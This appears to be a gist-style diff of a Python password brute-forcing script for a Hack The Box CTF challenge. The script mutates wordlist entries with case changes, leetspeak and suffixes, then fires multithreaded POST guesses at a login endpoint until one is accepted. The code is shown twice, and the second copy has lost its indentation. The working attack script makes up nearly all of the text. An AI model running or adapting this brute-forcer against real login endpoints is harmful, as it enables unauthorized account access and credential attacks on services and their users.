analogpixel · June 10, 2019 00:54
diff --git a/passwordCheck b/passwordCheck
 #!/usr/bin/env python

 # https://github.com/berzerk0/Probable-Wordlists/tree/master/Real-Passwords

 import requests
 import re
 import hashlib
 from threading import *
 from queue import *
 import argparse
 import signal
 import sys


 def numletters(password):
  s  = {'a': 4, 'e': 3, 'i': 1, 'o': 0,}
  for letter in s.keys():
    password = re.sub(letter, str(s[letter]), password)
  return password

 def mutations(password, final=False):
  ret = [password]
  ret.append( password.lower() )
  ret.append( password.upper() )

  ret += [ "{}!".format(x) for x in ret]
  ret += [ numletters(x) for x in ret]

  if not final:
    if  password[-1] == "s":
      ret += mutations(password[0:-1], True)
    else:
      ret += mutations( password + "s" ,True)
    ret += mutations(password[::-1], True)

  return list(set(ret))


 parser = argparse.ArgumentParser()
 parser.add_argument('-n', '--nomutate',  default=False,  action='store_true', help='do not mutate list')
 parser.add_argument('-v', '--verbose',  default=False,  action='store_true', help='do not mutate list')
 parser.add_argument('-f', '--file', type=str, default='file', help='name of the password file')
 parser.add_argument('-p', '--port', type=str, default='port', help='port to use')
 parser.add_argument('-t', '--threads', type=int, default=100, help='number of threads')
 args = parser.parse_args()

 URL="http://docker.hackthebox.eu:{}/".format(args.port)

 q = Queue()
 stopEvent = Event()

 # stop threads on ctrl-c
 def signal_handler(sig, frame):
    print('You pressed Ctrl+C!')
    stopEvent.set()

 signal.signal(signal.SIGINT, signal_handler)


 for word in open(args.file):
  if args.nomutate:
    q.put( word.strip() )
  else:
    for w in mutations( word.strip() ):
      q.put(w)

 def worker(stopEvent,trash):
  while not stopEvent.is_set():
    password = q.get()
    if args.verbose:
      print("Checking password:", password)
    try:
      r = requests.post(URL , {'password': password})
    except Exception as e:
      print("Error:", e)

    if r.text.find("Invalid password") == -1:
      if r.text.find("Too slow"):
        continue
      print("Password is:", password)
      print("Password found stopping all threads")
      stopEvent.set()
    q.task_done()

 tlist = []
 for i in range(args.threads):
     t = Thread(target=worker, args=(stopEvent,"a"))
     t.daemon = True
     t.start()
     tlist.append(t)

 for t in tlist:
  t.join()
	#!/usr/bin/env python

	# https://github.com/berzerk0/Probable-Wordlists/tree/master/Real-Passwords

	import requests
	import re
	import hashlib
	from threading import *
	from queue import *
	import argparse
	import signal
	import sys


	def numletters(password):
	s = {'a': 4, 'e': 3, 'i': 1, 'o': 0,}
	for letter in s.keys():
	password = re.sub(letter, str(s[letter]), password)
	return password

	def mutations(password, final=False):
	ret = [password]
	ret.append( password.lower() )
	ret.append( password.upper() )

	ret += [ "{}!".format(x) for x in ret]
	ret += [ numletters(x) for x in ret]

	if not final:
	if password[-1] == "s":
	ret += mutations(password[0:-1], True)
	else:
	ret += mutations( password + "s" ,True)
	ret += mutations(password[::-1], True)

	return list(set(ret))


	parser = argparse.ArgumentParser()
	parser.add_argument('-n', '--nomutate', default=False, action='store_true', help='do not mutate list')
	parser.add_argument('-v', '--verbose', default=False, action='store_true', help='do not mutate list')
	parser.add_argument('-f', '--file', type=str, default='file', help='name of the password file')
	parser.add_argument('-p', '--port', type=str, default='port', help='port to use')
	parser.add_argument('-t', '--threads', type=int, default=100, help='number of threads')
	args = parser.parse_args()

	URL="http://docker.hackthebox.eu:{}/".format(args.port)

	q = Queue()
	stopEvent = Event()

	# stop threads on ctrl-c
	def signal_handler(sig, frame):
	print('You pressed Ctrl+C!')
	stopEvent.set()

	signal.signal(signal.SIGINT, signal_handler)


	for word in open(args.file):
	if args.nomutate:
	q.put( word.strip() )
	else:
	for w in mutations( word.strip() ):
	q.put(w)

	def worker(stopEvent,trash):
	while not stopEvent.is_set():
	password = q.get()
	if args.verbose:
	print("Checking password:", password)
	try:
	r = requests.post(URL , {'password': password})
	except Exception as e:
	print("Error:", e)

	if r.text.find("Invalid password") == -1:
	if r.text.find("Too slow"):
	continue
	print("Password is:", password)
	print("Password found stopping all threads")
	stopEvent.set()
	q.task_done()

	tlist = []
	for i in range(args.threads):
	t = Thread(target=worker, args=(stopEvent,"a"))
	t.daemon = True
	t.start()
	tlist.append(t)

	for t in tlist:
	t.join()